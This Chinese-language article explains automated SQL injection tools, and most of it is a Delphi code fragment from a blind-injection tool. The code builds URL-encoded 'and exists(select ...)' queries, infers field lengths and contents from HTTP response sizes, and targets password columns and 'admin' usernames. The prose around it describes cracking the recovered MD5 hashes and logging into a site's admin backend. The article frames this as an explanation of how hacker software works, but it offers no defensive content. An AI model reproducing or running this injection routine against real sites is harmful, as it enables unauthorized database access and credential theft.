脚本漏洞之黑客工具分析(图)

看了上面的猜解是不是很麻烦，但如果我们用软件来猜解网络上存在注入的网站就只是几秒钟的事了。如下图：

上图只是对一个网站注入点的工具检测，当然看到了结果扫出来的密码为16位的md5加密码，但我们可以通过md5密码破解工具进行破解的。然后找到后台用所得的用户名和密码进行登录即可。对于黑客软件，其实并不是我们想象的那么复杂，只是根据掌握的漏洞信息提交相应该的数据罢了，我们看下下面一段用delphi写的注入的片段就清楚不过了。这里控件的设置和线程的创建略，我们主要是看看猜解的过程，如下：

procedure TMainForm.GuessContProc(ListInt: integer); {SQL注入 - 多线程猜解字段内容}

function SQLTextFunc(URl, TopStr, TableName, FieldName, LevelStr: string; Len: integer): string;

begin

Result := Url + ’%20and%20exists(select%20*%20from%20’ + TableName +’%20where%20len(’ + FieldName + ’)’ + LevelStr + IntToStr(Len) + ’%20and%20id=(Select%20max(id)%20From%20’ + TableName +’%20where%20id%20in%20(select%20top%20’ + TOPStr + ’%20id%20from%20’ + TableName + ’%20Order%20by%20id)))’

   end;

var

  TableName: string;

  FieldName, S: string;

  ContentInt: integer;

  i, Len, LengthInt, N: integer;

  GridCount: integer;

  Colu: TColumn;

  FlagBool: boolean;

begin

  Len := 0;

  LengthInt := 0;

  FlagBool := True;

  TableName := TableNameLst.Items[TableNameLst.Itemindex];

  FieldName := Memo2.Lines[ListInt];

  if (LowerCase(FieldName) = ’password’) or (LowerCase(FieldName) = ’pass’) or

    (LowerCase(FieldName) = ’admin_pass’) or (FieldName = ’密码’) or

    (LowerCase(FieldName) = ’userpassword’) or (LowerCase(FieldName) = ’passwd’) then

  begin

    ContentInt := Get_HttpSize(SQLTextFunc(sql_EdUrl.Text, sqlEdTop.Text, TableName, FieldName, ’=’, 16), 800);

    if ContentInt >= and1Num then

    begin

      SqlResultMemo.Lines.Add(FieldName + ’长度: 16’);

      LengthInt := 16

    end

    else

    begin

      while (Len <= 50) and (FlagBool) do

      begin

        application.ProcessMessages;

        inc(Len, 2);

        Pane1.Caption := ’正在检测长度:Len(’ + FieldName + ’)=’ + inttostr(Len);

        ContentInt := Get_HttpSize(SQLTextFunc(sql_EdUrl.Text, sqlEdTop.Text, TableName, FieldName, ’<=’, Len), 800);

        if ContentInt >= and1Num then

        begin

          for N := Len - 1 to Len do

          begin

            ContentInt := Get_HttpSize(SQLTextFunc(sql_EdUrl.Text, sqlEdTop.Text, TableName, FieldName, ’=’, N), 800);

            if ContentInt >= and1Num then

            begin

              LengthInt := N;

              SqlResultMemo.Lines.Add(FieldName + ’长度: ’ + inttostr(N));

              FlagBool := False;

              Break;

            end; // if

          end; // for

        end; // if

      end; // while

    end;

  end

  else

  begin

    while (Len <= 50) and (FlagBool) do

    begin

      application.ProcessMessages;

      inc(Len, 2);

      Pane1.Caption := ’正在检测长度:Len(’ + FieldName + ’)=’ + inttostr(Len);

      ContentInt := Get_HttpSize(SQLTextFunc(sql_EdUrl.Text, sqlEdTop.Text, TableName, FieldName, ’<=’, Len), 800);

      if ContentInt >= and1Num then

      begin

        for N := Len - 1 to Len do

        begin

          ContentInt := Get_HttpSize(SQLTextFunc(sql_EdUrl.Text, sqlEdTop.Text, TableName, FieldName, ’=’, N), 800);

          if ContentInt >= and1Num then

          begin

            LengthInt := N;

            SqlResultMemo.Lines.Add(FieldName + ’长度: ’ + inttostr(N));

            FlagBool := False;

            Break;

          end; // if

        end; // for

      end; // if

    end; // while

  end;

  GuessLsv.Clear;

  if Len >= 50 then

  begin

    sql_EdUrl.Enabled := True;

    Sql_GuessTable.Enabled := True;

    TableNameLst.Enabled := True;

    FieldNameLst.Enabled := True;

    application.MessageBox(’列名长度大于50,猜解失败!’, ’提示’, 32);

    Exit;

  end;

  Pane1.Caption := ’正在检测’ + FieldName + ’的内容...’;

  GuessLsv.Update;

  if LengthInt = 5 then

  begin

    ContentInt := Get_HttpSize(Sql_EdUrl.Text + ’%20and%20exists%20(select%20top%20’ + sqlEdTop.Text + ’%20’ + FieldName + ’%20from%20’ + TableName + ’%20where%20instr(’ + FieldName + ’,’’admin’’)=1%20and%20len(username)=5)’);

    if ContentInt >= and1Num then

    begin

      s := ’admin’;

      for i := 1 to 5 do

      begin

        application.ProcessMessages;

        with GuessLsv.Items.Add do

        begin

          caption := ’第’ + inttostr(i) + ’位’;

          SubItems.Add(s[i]);

        end;

        sleep(60);

        GuessLsv.Update;

      end;

      inc(SQL_ScanContent_ThreadCreateCount);

      StringGrid1.Cells[SQL_ScanContent_ThreadCreateCount - 1, 1] := ’admin’;

      StringGrid1.Cells[SQL_ScanContent_ThreadCreateCount, 1] := ’检测中...’;

      SqlResultMemo.Lines.Add(FieldNameLst.Items[FieldNameLst.Itemindex] + ’内容:admin’);

      if SQL_ScanContent_ThreadCreateCount <= Memo2.Lines.Count then

        GuessContProc(SQL_ScanContent_ThreadCreateCount - 1);

      Exit;

    end

    else

    begin

      for i := 1 to LengthInt do

      begin

        application.ProcessMessages;

        with GuessLsv.Items.Add do

        begin

          caption := ’第’ + inttostr(i) + ’位’;

          SubItems.Add(’检测中’);

        end;

        sleep(30);

      end;

    end;

  end

  else

  begin

    for i := 1 to LengthInt do

    begin

      application.ProcessMessages;

      with GuessLsv.Items.Add do

      begin

        caption := ’第’ + inttostr(i) + ’位’;

        SubItems.Add(’检测中’);

      end;

      sleep(30);

    end;

  end;

从上面的代码中，我们可以看出，黑客软件只是代替了手工操作，通过多线程更进一步提高了猜解的速度，但猜解的表和字段还得我们自己设定，然后通过post提交我们设定的格式(其中url中的%20是空格的意思，因为在网址后面执行相应的sql语句时都要有相应的空格)，按照我们设定的表和字段猜解出相应的用户名和密码内容。